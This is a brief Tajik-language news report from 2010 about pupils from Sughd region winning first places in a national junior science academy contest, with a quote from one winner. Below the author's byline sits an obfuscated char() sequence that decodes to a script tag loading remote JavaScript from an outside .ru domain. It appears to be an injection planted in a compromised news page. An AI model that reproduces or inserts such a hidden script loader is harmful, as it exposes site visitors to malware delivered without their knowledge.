19.05.2010
7 нафар ҷои аввалро ишғол карданд
Чанде пеш дар шаҳри Душанбе озмуни ҷумҳуриявии академияи хурди илмҳо баргузор гардида буд. Дар ин озмун аз вилояти Суғд низ 30 нафар мактабиён ширкат доштанд. Аз байни онҳо 7 нафар ҷои аввалро ишғол намуданд. Аз ҷумла аз ноҳияи Б. Ғафуров 7 нафар толибилмон ширкат варзида буданд. Аз онҳо 5 нафар ҷои аввал, 1 нафар ҷои дуввум ва 1 нафар ҷои сеюмро аз рӯи фанҳои гуногун ишғол карданд.
Толибилмонро ҳамсабақон волидон ва омӯзгорон дар фурудгоҳи байналхалқии шаҳри Хуҷанд пешвоз гирифтанд.
Фарзона Алибоева яке аз ширкаткунандагони озмун чунин баёни фикр намуд «Ман дар ин озмун ҷои аввалро гирифтам, ба ҳамсабақони худ гуфтаниам, ки бештар китоб хонанд ва ба монанди ман дар озмунҳо дониши худро бисанҷанд»
Назокат Юсупова
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)692965095b499bf56efacc9c1c3ebe04.js" type="text/javascript">

ТАВЗЕҲОТ